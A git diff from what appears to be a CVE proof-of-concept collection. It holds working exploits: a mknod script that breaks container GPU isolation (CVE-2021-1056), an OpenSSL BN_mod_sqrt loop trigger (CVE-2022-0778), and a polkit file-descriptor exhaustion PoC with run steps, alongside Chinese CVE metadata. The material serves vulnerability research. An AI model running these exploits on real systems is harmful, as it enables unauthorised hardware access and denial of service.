-INIT_GPU_NUM=$(util::get_gpu_num)
-util::log_info "init GPU num: $INIT_GPU_NUM"
-
-# get major number and minor number from a legal GPU
-DEV=/dev/$(ls /dev | grep nvidia[0-9] | head -n 1)
-DEV_NUMBER=$(printf "%d %d" $(stat --format "0x%t 0x%T" $DEV))
-
-GPU_NO=0
-while :
-do
- # skip this no if device file already exists
- if [ -c "/dev/nvidia$GPU_NO" ]; then
- util::log_debug "/dev/nvidia$GPU_NO exists, skip"
- GPU_NO=`expr $GPU_NO + 1`
- continue
- fi
-
- CURRENT_GPU_NUM=$(util::get_gpu_num)
-
- # create specify device file to trick cgroup
- mknod -m 666 /dev/nvidia$GPU_NO c $DEV_NUMBER
-
- # break if have got all GPUs on the host
- if [ $(util::get_gpu_num) == "$CURRENT_GPU_NUM" ]; then
- util::log_debug "delete redundant /dev/nvidia$GPU_NO"
- rm /dev/nvidia$GPU_NO
- break
- fi
-
- util::log_debug "successfully get /dev/nvidia$GPU_NO"
- GPU_NO=`expr $GPU_NO + 1`
-done
-
-util::log_info "get extra $(expr $CURRENT_GPU_NUM - $INIT_GPU_NUM) GPU devices from host"
-util::log_info "current GPU num: $CURRENT_GPU_NUM"
-util::log_info "exec nvidia-smi:"
+#!/usr/bin/env bash
+
+ROOT=$(cd $(dirname ${BASH_SOURCE[0]}) && pwd -P)
+source "${ROOT}/util.sh"
+
+INIT_GPU_NUM=$(util::get_gpu_num)
+util::log_info "init GPU num: $INIT_GPU_NUM"
+
+# get major number and minor number from a legal GPU
+DEV=/dev/$(ls /dev | grep nvidia[0-9] | head -n 1)
+DEV_NUMBER=$(printf "%d %d" $(stat --format "0x%t 0x%T" $DEV))
+
+GPU_NO=0
+while :
+do
+ # skip this no if device file already exists
+ if [ -c "/dev/nvidia$GPU_NO" ]; then
+ util::log_debug "/dev/nvidia$GPU_NO exists, skip"
+ GPU_NO=`expr $GPU_NO + 1`
+ continue
+ fi
+
+ CURRENT_GPU_NUM=$(util::get_gpu_num)
+
+ # create specify device file to trick cgroup
+ mknod -m 666 /dev/nvidia$GPU_NO c $DEV_NUMBER
+
+ # break if have got all GPUs on the host
+ if [ $(util::get_gpu_num) == "$CURRENT_GPU_NUM" ]; then
+ util::log_debug "delete redundant /dev/nvidia$GPU_NO"
+ rm /dev/nvidia$GPU_NO
+ break
+ fi
+
+ util::log_debug "successfully get /dev/nvidia$GPU_NO"
+ GPU_NO=`expr $GPU_NO + 1`
+done
+
+util::log_info "get extra $(expr $CURRENT_GPU_NUM - $INIT_GPU_NUM) GPU devices from host"
+util::log_info "current GPU num: $CURRENT_GPU_NUM"
+util::log_info "exec nvidia-smi:"
 nvidia-smi
\ No newline at end of file
diff --git a/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py
index e662da34..040afbf5 100644
--- a/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py
+++ b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py
@@ -1,106 +1,106 @@
-# coding=utf-8
-from tensorflow.examples.tutorials.mnist import input_data
-from tensorflow.python.client import device_lib
-
-mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
-
-import tensorflow as tf
-
-learning_rate = 0.001
-training_steps = 8250
-batch_size = 100
-display_step = 100
-
-n_hidden_1 = 256
-n_hidden_2 = 256
-n_input = 784
-n_classes = 10
-
-def _variable_on_cpu(name, shape, initializer):
- with tf.device('/cpu:0'):
- dtype = tf.float32
- var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
- return var
-
-def build_model():
-
- def multilayer_perceptron(x, weights, biases):
- layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])
- layer_1 = tf.nn.relu(layer_1)
-
- layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])
- layer_2 = tf.nn.relu(layer_2)
-
- out_layer = tf.matmul(layer_2, weights['out']) + biases['out']
- return out_layer
-
- with tf.variable_scope('aaa'):
- weights = {
- 'h1': _variable_on_cpu('h1',[n_input, n_hidden_1],tf.random_normal_initializer()),
- 'h2': _variable_on_cpu('h2',[n_hidden_1, n_hidden_2],tf.random_normal_initializer()),
- 'out': _variable_on_cpu('out_w',[n_hidden_2, n_classes],tf.random_normal_initializer())
- }
- biases = {
- 'b1': _variable_on_cpu('b1',[n_hidden_1],tf.random_normal_initializer()),
- 'b2': _variable_on_cpu('b2',[n_hidden_2],tf.random_normal_initializer()),
- 'out': _variable_on_cpu('out_b',[n_classes],tf.random_normal_initializer())
- }
-
- pred = multilayer_perceptron(x, weights, biases)
-
- cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))
- return cost,pred
-
-
-def average_gradients(tower_grads):
- average_grads = []
- for grad_and_vars in zip(*tower_grads):
- grads = []
- for g,_ in grad_and_vars:
- expanded_g = tf.expand_dims(g, 0)
- grads.append(expanded_g)
- grad = tf.concat(axis=0, values=grads)
- grad = tf.reduce_mean(grad, 0)
- v = grad_and_vars[0][1]
- grad_and_var = (grad, v)
- average_grads.append(grad_and_var)
- return average_grads
-
-
-with tf.Graph().as_default(), tf.device('/cpu:0'):
- x = tf.placeholder("float", [None, n_input])
- y = tf.placeholder("float", [None, n_classes])
- tower_grads = []
- optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
- local_device_protos = device_lib.list_local_devices()
- num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU'])
- with tf.variable_scope(tf.get_variable_scope()):
- for i in xrange(num_gpus):
- with tf.device('/gpu:%d' % i):
- cost,pred = build_model()
- tf.get_variable_scope().reuse_variables()
- grads = optimizer.compute_gradients(cost)
- tower_grads.append(grads)
-
- grads = average_gradients(tower_grads)
- apply_gradient_op = optimizer.apply_gradients(grads)
- train_op = apply_gradient_op
-
- init = tf.global_variables_initializer()
- sess = tf.Session()
- sess.run(init)
-
- for step in range(training_steps):
- image_batch, label_batch = mnist.train.next_batch(batch_size)
- _, cost_print = sess.run([train_op, cost],
- {x:image_batch,
- y:label_batch})
-
- if step % display_step == 0:
- print("step=%04d" % (step+1)+ " cost=" + str(cost_print))
- print("Optimization Finished!")
- correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
- accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
- with sess.as_default():
- print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels}))
+# coding=utf-8
+from tensorflow.examples.tutorials.mnist import input_data
+from tensorflow.python.client import device_lib
+
+mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
+
+import tensorflow as tf
+
+learning_rate = 0.001
+training_steps = 8250
+batch_size = 100
+display_step = 100
+
+n_hidden_1 = 256
+n_hidden_2 = 256
+n_input = 784
+n_classes = 10
+
+def _variable_on_cpu(name, shape, initializer):
+ with tf.device('/cpu:0'):
+ dtype = tf.float32
+ var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
+ return var
+
+def build_model():
+
+ def multilayer_perceptron(x, weights, biases):
+ layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])
+ layer_1 = tf.nn.relu(layer_1)
+
+ layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])
+ layer_2 = tf.nn.relu(layer_2)
+
+ out_layer = tf.matmul(layer_2, weights['out']) + biases['out']
+ return out_layer
+
+ with tf.variable_scope('aaa'):
+ weights = {
+ 'h1': _variable_on_cpu('h1',[n_input, n_hidden_1],tf.random_normal_initializer()),
+ 'h2': _variable_on_cpu('h2',[n_hidden_1, n_hidden_2],tf.random_normal_initializer()),
+ 'out': _variable_on_cpu('out_w',[n_hidden_2, n_classes],tf.random_normal_initializer())
+ }
+ biases = {
+ 'b1': _variable_on_cpu('b1',[n_hidden_1],tf.random_normal_initializer()),
+ 'b2': _variable_on_cpu('b2',[n_hidden_2],tf.random_normal_initializer()),
+ 'out': _variable_on_cpu('out_b',[n_classes],tf.random_normal_initializer())
+ }
+
+ pred = multilayer_perceptron(x, weights, biases)
+
+ cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))
+ return cost,pred
+
+
+def average_gradients(tower_grads):
+ average_grads = []
+ for grad_and_vars in zip(*tower_grads):
+ grads = []
+ for g,_ in grad_and_vars:
+ expanded_g = tf.expand_dims(g, 0)
+ grads.append(expanded_g)
+ grad = tf.concat(axis=0, values=grads)
+ grad = tf.reduce_mean(grad, 0)
+ v = grad_and_vars[0][1]
+ grad_and_var = (grad, v)
+ average_grads.append(grad_and_var)
+ return average_grads
+
+
+with tf.Graph().as_default(), tf.device('/cpu:0'):
+ x = tf.placeholder("float", [None, n_input])
+ y = tf.placeholder("float", [None, n_classes])
+ tower_grads = []
+ optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
+ local_device_protos = device_lib.list_local_devices()
+ num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU'])
+ with tf.variable_scope(tf.get_variable_scope()):
+ for i in xrange(num_gpus):
+ with tf.device('/gpu:%d' % i):
+ cost,pred = build_model()
+ tf.get_variable_scope().reuse_variables()
+ grads = optimizer.compute_gradients(cost)
+ tower_grads.append(grads)
+
+ grads = average_gradients(tower_grads)
+ apply_gradient_op = optimizer.apply_gradients(grads)
+ train_op = apply_gradient_op
+
+ init = tf.global_variables_initializer()
+ sess = tf.Session()
+ sess.run(init)
+
+ for step in range(training_steps):
+ image_batch, label_batch = mnist.train.next_batch(batch_size)
+ _, cost_print = sess.run([train_op, cost],
+ {x:image_batch,
+ y:label_batch})
+
+ if step % display_step == 0:
+ print("step=%04d" % (step+1)+ " cost=" + str(cost_print))
+ print("Optimization Finished!")
+ correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
+ accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
+ with sess.as_default():
+ print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels}))
 sess.close()
\ No newline at end of file
diff --git a/cve/nvidia/2021/CVE-2021-1056/util.sh b/cve/nvidia/2021/CVE-2021-1056/util.sh
index edadd3aa..495da6a5 100644
--- a/cve/nvidia/2021/CVE-2021-1056/util.sh
+++ b/cve/nvidia/2021/CVE-2021-1056/util.sh
@@ -1,13 +1,13 @@
-#!/usr/bin/env bash
-
-function util::get_gpu_num() {
- echo "$(nvidia-smi -L | wc -l)"
-}
-
-function util::log_info() {
- echo "[INFO] $1"
-}
-
-function util::log_debug() {
- echo "[DEBUG] $1"
+#!/usr/bin/env bash
+
+function util::get_gpu_num() {
+ echo "$(nvidia-smi -L | wc -l)"
+}
+
+function util::log_info() {
+ echo "[INFO] $1"
+}
+
+function util::log_debug() {
+ echo "[DEBUG] $1"
 }
\ No newline at end of file
diff --git a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml
index 40d10b98..2e7920f2 100644
--- a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml
+++ b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml
@@ -1,23 +1,23 @@
-id: CVE-2021-1056
-source: https://github.com/pokerfaceSad/CVE-2021-1056
-info:
- name: NVIDIA提供了针对Linux系统的官方显卡驱动程序,这些驱动程序包括内核模块、用户空间库和命令行工具,可以与Linux操作系统集成,提供高性能的图形加速和计算能力。
- severity: High
- description: |
- 漏洞CVE-2021-1056是NVIDIA GPU驱动程序与设备隔离相关的安全漏洞。当容器以非特权模式启动,攻击者利用这个漏洞,在容器中创建特殊的字符设备文件后,能够获取宿主机上所有GPU设备的访问权限。
- 适用于Linux的 NVIDIA GPU显示驱动程序,所有版本,都包含内核模式层 (nvidia.ko) 中的一个漏洞,在该漏洞中它不完全遵守操作系统文件系统权限以提供 GPU 设备级隔离,这可能会导致拒绝服务 或信息披露。
- scope-of-influence:
- nvidia:gpu_driver:390≤390.141, nvidia:gpu_driver:450≤450.102.04, nvidia:gpu_driver:460≤460.32.03.
- reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1056
- - https://nvidia.custhelp.com/app/answers/detail/a_id/5142
- - https://ubuntu.com/security/notices/USN-4689-1
- - https://ubuntu.com/security/notices/USN-4689-2
- - https://ubuntu.com/security/CVE-2021-1056
- - https://www.cvedetails.com/cve/CVE-2021-1056/?q=CVE-2021-1056
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
- cvss-score: 7.1
- cve-id: CVE-2021-1056
- cwe-id: CWE-276
+id: CVE-2021-1056
+source: https://github.com/pokerfaceSad/CVE-2021-1056
+info:
+ name: NVIDIA提供了针对Linux系统的官方显卡驱动程序,这些驱动程序包括内核模块、用户空间库和命令行工具,可以与Linux操作系统集成,提供高性能的图形加速和计算能力。
+ severity: High
+ description: |
+ 漏洞CVE-2021-1056是NVIDIA GPU驱动程序与设备隔离相关的安全漏洞。当容器以非特权模式启动,攻击者利用这个漏洞,在容器中创建特殊的字符设备文件后,能够获取宿主机上所有GPU设备的访问权限。
+ 适用于Linux的 NVIDIA GPU显示驱动程序,所有版本,都包含内核模式层 (nvidia.ko) 中的一个漏洞,在该漏洞中它不完全遵守操作系统文件系统权限以提供 GPU 设备级隔离,这可能会导致拒绝服务 或信息披露。
+ scope-of-influence:
+ nvidia:gpu_driver:390≤390.141, nvidia:gpu_driver:450≤450.102.04, nvidia:gpu_driver:460≤460.32.03.
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1056
+ - https://nvidia.custhelp.com/app/answers/detail/a_id/5142
+ - https://ubuntu.com/security/notices/USN-4689-1
+ - https://ubuntu.com/security/notices/USN-4689-2
+ - https://ubuntu.com/security/CVE-2021-1056
+ - https://www.cvedetails.com/cve/CVE-2021-1056/?q=CVE-2021-1056
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
+ cvss-score: 7.1
+ cve-id: CVE-2021-1056
+ cwe-id: CWE-276
 tags: 权限提升, 拒绝服务, 信息泄漏, cve2021
\ No newline at end of file
diff --git a/cve/openssl/2022/CVE-2022-0778/bad_BN.c b/cve/openssl/2022/CVE-2022-0778/bad_BN.c
index 34247ac8..6fbf819b 100644
--- a/cve/openssl/2022/CVE-2022-0778/bad_BN.c
+++ b/cve/openssl/2022/CVE-2022-0778/bad_BN.c
@@ -1,22 +1,22 @@
-#include
-
-
-int main() {
- BN_CTX *ctx;
- ctx = BN_CTX_new();
- BIGNUM *res, *a, *p;
- res = BN_CTX_get(ctx);
- a = BN_CTX_get(ctx);
- p = BN_CTX_get(ctx);
-
- BN_dec2bn(&p, "697");
- BN_dec2bn(&a, "696");
-
- printf("p = %s\n", BN_bn2dec(p));
- printf("a = %s\n", BN_bn2dec(a));
-
- BIGNUM* check = BN_mod_sqrt(res, a, p, ctx);
- printf("%s\n", BN_bn2dec(res));
-
- return 0;
+#include
+
+
+int main() {
+ BN_CTX *ctx;
+ ctx = BN_CTX_new();
+ BIGNUM *res, *a, *p;
+ res = BN_CTX_get(ctx);
+ a = BN_CTX_get(ctx);
+ p = BN_CTX_get(ctx);
+
+ BN_dec2bn(&p, "697");
+ BN_dec2bn(&a, "696");
+
+ printf("p = %s\n", BN_bn2dec(p));
+ printf("a = %s\n", BN_bn2dec(a));
+
+ BIGNUM* check = BN_mod_sqrt(res, a, p, ctx);
+ printf("%s\n", BN_bn2dec(res));
+
+ return 0;
 }
\ No newline at end of file
diff --git a/cve/openssl/2022/yaml/CVE-2022-3786.yaml b/cve/openssl/2022/yaml/CVE-2022-3786.yaml
index c532b8a2..f34c7ba9 100644
--- a/cve/openssl/2022/yaml/CVE-2022-3786.yaml
+++ b/cve/openssl/2022/yaml/CVE-2022-3786.yaml
@@ -1,19 +1,19 @@
-id: CVE-2022-3786
-source: https://github.com/WhatTheFuzz/openssl-fuzz
-info:
- name: 在TLS客户端中,通过连接到恶意服务器来触发漏洞。如果服务器请求客户端身份验证而恶意客户端连接,触发OpenSSL缓冲区溢出漏洞。
- severity: High
- description: |
- 在X.509证书验证中,特别是在名称约束检查中,可能会触发缓冲区溢出。这种情况发生在证书链签名验证之后,并且要求CA已经签署了恶意证书,或者要求应用程序在无法构造到受信任的颁发者的路径的情况下继续进行证书验证。攻击者可以在证书中伪造一个恶意的电子邮件地址来溢出任意数量的字节,其中包含'。'字符(十进制46)。缓冲区溢出可能导致崩溃(导致拒绝服务)。
- scope-of-influence:
- 3.0.0 <= OpenSSL <= 3.0.6
- reference:
- https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c42165b5706e42f67ef8ef4c351a9a4c5d21639a
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- cvss-score: 7.5
- cve-id: CVE-2022-3786
- cwe-id: CWE-120
- cnvd-id: None
- kve-id: None
+id: CVE-2022-3786
+source: https://github.com/WhatTheFuzz/openssl-fuzz
+info:
+ name: 在TLS客户端中,通过连接到恶意服务器来触发漏洞。如果服务器请求客户端身份验证而恶意客户端连接,触发OpenSSL缓冲区溢出漏洞。
+ severity: High
+ description: |
+ 在X.509证书验证中,特别是在名称约束检查中,可能会触发缓冲区溢出。这种情况发生在证书链签名验证之后,并且要求CA已经签署了恶意证书,或者要求应用程序在无法构造到受信任的颁发者的路径的情况下继续进行证书验证。攻击者可以在证书中伪造一个恶意的电子邮件地址来溢出任意数量的字节,其中包含'。'字符(十进制46)。缓冲区溢出可能导致崩溃(导致拒绝服务)。
+ scope-of-influence:
+ 3.0.0 <= OpenSSL <= 3.0.6
+ reference:
+ https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c42165b5706e42f67ef8ef4c351a9a4c5d21639a
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 7.5
+ cve-id: CVE-2022-3786
+ cwe-id: CWE-120
+ cnvd-id: None
+ kve-id: None
 tags: 缓冲区溢出, CVE-2022
\ No newline at end of file
diff --git a/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt b/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt
index c76a99b7..5ecd18e9 100644
--- a/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt
+++ b/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt
@@ -1,30 +1,30 @@
-cmake_minimum_required(VERSION 3.10)
-
-enable_testing()
-
-# set the project name
-project(GHSL-2021-077-polkit VERSION 1.0.0 DESCRIPTION "Proof of concept exploit for GHSL-2021-077: file descriptor exhaustion in polkit")
-
-# specify the C++ standard
-set(CMAKE_CXX_STANDARD 17)
-set(CMAKE_CXX_STANDARD_REQUIRED True)
-
-option(USE_SANITIZERS "Enable ASAN and UBSAN" OFF)
-
-add_compile_options(-Wall -Wextra -pedantic -Werror)
-
-if (USE_SANITIZERS)
- set(SANITIZER_FLAGS "-fsanitize=address,undefined")
- set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} ${SANITIZER_FLAGS}")
- set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} ${SANITIZER_FLAGS}")
- set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
- set(CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
-endif()
-
-add_subdirectory(DBusParse)
-
-add_executable(locksessions locksessions.cpp)
-target_link_libraries(locksessions PUBLIC DBusParse DBusParseUtils crypt)
-target_include_directories(
- locksessions PRIVATE
- $)
+cmake_minimum_required(VERSION 3.10)
+
+enable_testing()
+
+# set the project name
+project(GHSL-2021-077-polkit VERSION 1.0.0 DESCRIPTION "Proof of concept exploit for GHSL-2021-077: file descriptor exhaustion in polkit")
+
+# specify the C++ standard
+set(CMAKE_CXX_STANDARD 17)
+set(CMAKE_CXX_STANDARD_REQUIRED True)
+
+option(USE_SANITIZERS "Enable ASAN and UBSAN" OFF)
+
+add_compile_options(-Wall -Wextra -pedantic -Werror)
+
+if (USE_SANITIZERS)
+ set(SANITIZER_FLAGS "-fsanitize=address,undefined")
+ set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} ${SANITIZER_FLAGS}")
+ set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} ${SANITIZER_FLAGS}")
+ set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
+ set(CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
+endif()
+
+add_subdirectory(DBusParse)
+
+add_executable(locksessions locksessions.cpp)
+target_link_libraries(locksessions PUBLIC DBusParse DBusParseUtils crypt)
+target_include_directories(
+ locksessions PRIVATE
+ $)
diff --git a/cve/polkit/2021/CVE-2021-4115/README.md b/cve/polkit/2021/CVE-2021-4115/README.md
index 5f7d84a9..f8168c41 100644
--- a/cve/polkit/2021/CVE-2021-4115/README.md
+++ b/cve/polkit/2021/CVE-2021-4115/README.md
@@ -1,52 +1,52 @@
-Copyright 2021 Kevin Backhouse.
-
-# GHSL-2021-077
-
-This repository contains a proof of concept exploit for GHSL-2021-077:
-file descriptor exhaustion in
-[polkit](https://gitlab.freedesktop.org/polkit/polkit).
-
-# Build
-
-Instructions for building the PoC:
-
-```bash
-git submodule update --init # Download https://github.com/kevinbackhouse/DBusParse
-mkdir build
-cd build
-cmake ..
-make
-```
-
-# Running
-
-The PoC causes polkit to leak eventfd file descriptors. After several runs
-of the PoC, polkit will leak so many file descriptors that it will crash
-due to exceeding its quota of file descriptors.
-
-First, check how many file descriptors polkit has open:
-
-```bash
-$ sudo ls -l /proc/`pidof polkitd`/fd | wc
- 12 123 680
-```
-
-Now run the PoC:
-
-```bash
-./locksessions /var/run/dbus/system_bus_socket 0x4000
-```
-
-(The PoC is named locksessions because it calls the
-org.freedesktop.login1.Manager.LockSessions D-Bus method.)
-
-Now check again how many file descriptors polkit has open:
-
-```
-$ sudo ls -l /proc/`pidof polkitd`/fd | wc
- 255 2796 16872
-```
-
-Notice that a large number of eventfd file descriptors have been
-leaked. After few more runs of the PoC, polkit will most likely
-crash.
+Copyright 2021 Kevin Backhouse.
+
+# GHSL-2021-077
+
+This repository contains a proof of concept exploit for GHSL-2021-077:
+file descriptor exhaustion in
+[polkit](https://gitlab.freedesktop.org/polkit/polkit).
+
+# Build
+
+Instructions for building the PoC:
+
+```bash
+git submodule update --init # Download https://github.com/kevinbackhouse/DBusParse
+mkdir build
+cd build
+cmake ..
+make
+```
+
+# Running
+
+The PoC causes polkit to leak eventfd file descriptors. After several runs
+of the PoC, polkit will leak so many file descriptors that it will crash
+due to exceeding its quota of file descriptors.
+
+First, check how many file descriptors polkit has open:
+
+```bash
+$ sudo ls -l /proc/`pidof polkitd`/fd | wc
+ 12 123 680
+```
+
+Now run the PoC:
+
+```bash
+./locksessions /var/run/dbus/system_bus_socket 0x4000
+```
+
+(The PoC is named locksessions because it calls the
+org.freedesktop.login1.Manager.LockSessions D-Bus method.)
+
+Now check again how many file descriptors polkit has open:
+
+```
+$ sudo ls -l /proc/`pidof polkitd`/fd | wc
+ 255 2796 16872
+```
+
+Notice that a large number of eventfd file descriptors have been
+leaked. After few more runs of the PoC, polkit will most likely
+crash.
diff --git a/cve/polkit/2021/CVE-2021-4115/locksessions.cpp b/cve/polkit/2021/CVE-2021-4115/locksessions.cpp
index 2046cc8a..5c036a26 100644
--- a/cve/polkit/2021/CVE-2021-4115/locksessions.cpp
+++ b/cve/polkit/2021/CVE-2021-4115/locksessions.cpp
@@ -1,111 +1,111 @@
-// Copyright 2021 Kevin Backhouse.
-//
-// This file is part of GHSL-2021-077-polkit.
-//
-// GHSL-2021-077-polkit is free software: you can redistribute it and/or modify
-// it under the terms of the GNU General Public License as published by
-// the Free Software Foundation, either version 3 of the License, or
-// (at your option) any later version.
-//
-// GHSL-2021-077-polkit is distributed in the hope that it will be useful,
-// but WITHOUT ANY WARRANTY; without even the implied warranty of
-// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-// GNU General Public License for more details.
-//
-// You should have received a copy of the GNU General Public License
-// along with GHSL-2021-077-polkit. If not, see .
-
-
-#include "dbus_utils.hpp"
-#include "dbus_auth.hpp"
-#include "utils.hpp"
-#include
-#include
-#include
-
-class DBusSocket : public AutoCloseFD {
-public:
- DBusSocket(const uid_t uid, const char* filename) :
- AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0))
- {
- if (get() < 0) {
- throw ErrorWithErrno("Could not create socket");
- }
-
- sockaddr_un address;
- memset(&address, 0, sizeof(address));
- address.sun_family = AF_UNIX;
- strcpy(address.sun_path, filename);
-
- if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) {
- throw ErrorWithErrno("Could not connect socket");
- }
-
- dbus_sendauth(uid, get());
-
- dbus_send_hello(get());
- std::unique_ptr hello_reply1 = receive_dbus_message(get());
- std::string name = hello_reply1->getBody().getElement(0)->toString().getValue();
- std::unique_ptr hello_reply2 = receive_dbus_message(get());
- }
-};
-
-static void send_logind_LockSessions(const int fd, const uint32_t serialNumber) {
- dbus_method_call(
- fd,
- serialNumber,
- DBusMessageBody::mk0(),
- _s("/org/freedesktop/login1"),
- _s("org.freedesktop.login1.Manager"),
- _s("org.freedesktop.login1"),
- _s("LockSessions")
- );
-}
-
-// Keep trying `attempt_LockSessions_with_disconnect` with different
-// delay values until the exploit succeeds (or we decide to give up).
-static void exploit_LockSessions(
- const uid_t uid,
- const char* filename,
- const long n
-) {
- DBusSocket fd(uid, filename);
-
- for (long i = 0; i < n; i++) {
- send_logind_LockSessions(fd.get(), i+1);
- }
-}
-
-static void usage(const char* progname) {
- fprintf(
- stderr,
- "usage: %s \n"
- "example: %s /var/run/dbus/system_bus_socket 4096\n",
- progname,
- progname
- );
-}
-
-int main(int argc, char* argv[]) {
- const char* progname = argc > 0 ? argv[0] : "a.out";
- if (argc != 3) {
- usage(progname);
- return EXIT_FAILURE;
- }
-
- char* endptr = 0;
- const long n = strtol(argv[2], &endptr, 0);
- if (endptr == argv[2] || *endptr != '\0') {
- usage(progname);
- return EXIT_FAILURE;
- }
-
- const uid_t uid = getuid();
- const char* filename = argv[1];
-
- for (size_t i = 0; i < 1; i++) {
- exploit_LockSessions(uid, filename, n);
- }
-
- return EXIT_SUCCESS;
-}
+// Copyright 2021 Kevin Backhouse.
+//
+// This file is part of GHSL-2021-077-polkit.
+//
+// GHSL-2021-077-polkit is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// GHSL-2021-077-polkit is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with GHSL-2021-077-polkit. If not, see .
+
+
+#include "dbus_utils.hpp"
+#include "dbus_auth.hpp"
+#include "utils.hpp"
+#include
+#include
+#include
+
+class DBusSocket : public AutoCloseFD {
+public:
+ DBusSocket(const uid_t uid, const char* filename) :
+ AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0))
+ {
+ if (get() < 0) {
+ throw ErrorWithErrno("Could not create socket");
+ }
+
+ sockaddr_un address;
+ memset(&address, 0, sizeof(address));
+ address.sun_family = AF_UNIX;
+ strcpy(address.sun_path, filename);
+
+ if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) {
+ throw ErrorWithErrno("Could not connect socket");
+ }
+
+ dbus_sendauth(uid, get());
+
+ dbus_send_hello(get());
+ std::unique_ptr hello_reply1 = receive_dbus_message(get());
+ std::string name = hello_reply1->getBody().getElement(0)->toString().getValue();
+ std::unique_ptr hello_reply2 = receive_dbus_message(get());
+ }
+};
+
+static void send_logind_LockSessions(const int fd, const uint32_t serialNumber) {
+ dbus_method_call(
+ fd,
+ serialNumber,
+ DBusMessageBody::mk0(),
+ _s("/org/freedesktop/login1"),
+ _s("org.freedesktop.login1.Manager"),
+ _s("org.freedesktop.login1"),
+ _s("LockSessions")
+ );
+}
+
+// Keep trying `attempt_LockSessions_with_disconnect` with different
+// delay values until the exploit succeeds (or we decide to give up).
+static void exploit_LockSessions(
+ const uid_t uid,
+ const char* filename,
+ const long n
+) {
+ DBusSocket fd(uid, filename);
+
+ for (long i = 0; i < n; i++) {
+ send_logind_LockSessions(fd.get(), i+1);
+ }
+}
+
+static void usage(const char* progname) {
+ fprintf(
+ stderr,
+ "usage: %s \n"
+ "example: %s /var/run/dbus/system_bus_socket 4096\n",
+ progname,
+ progname
+ );
+}
+
+int main(int argc, char* argv[]) {
+ const char* progname = argc > 0 ? argv[0] : "a.out";
+ if (argc != 3) {
+ usage(progname);
+ return EXIT_FAILURE;
+ }
+
+ char* endptr = 0;
+ const long n = strtol(argv[2], &endptr, 0);
+ if (endptr == argv[2] || *endptr != '\0') {
+ usage(progname);
+ return EXIT_FAILURE;
+ }
+
+ const uid_t uid = getuid();
+ const char* filename = argv[1];
+
+ for (size_t i = 0; i < 1; i++) {
+ exploit_LockSessions(uid, filename, n);
+ }
+
+ return EXIT_SUCCESS;
+}
diff --git a/cve/polkit/2021/yaml/CVE-2021-4115.yaml b/cve/polkit/2021/yaml/CVE-2021-4115.yaml
index 6b342c54..335c9413 100644
--- a/cve/polkit/2021/yaml/CVE-2021-4115.yaml
+++ b/cve/polkit/2021/yaml/CVE-2021-4115.yaml
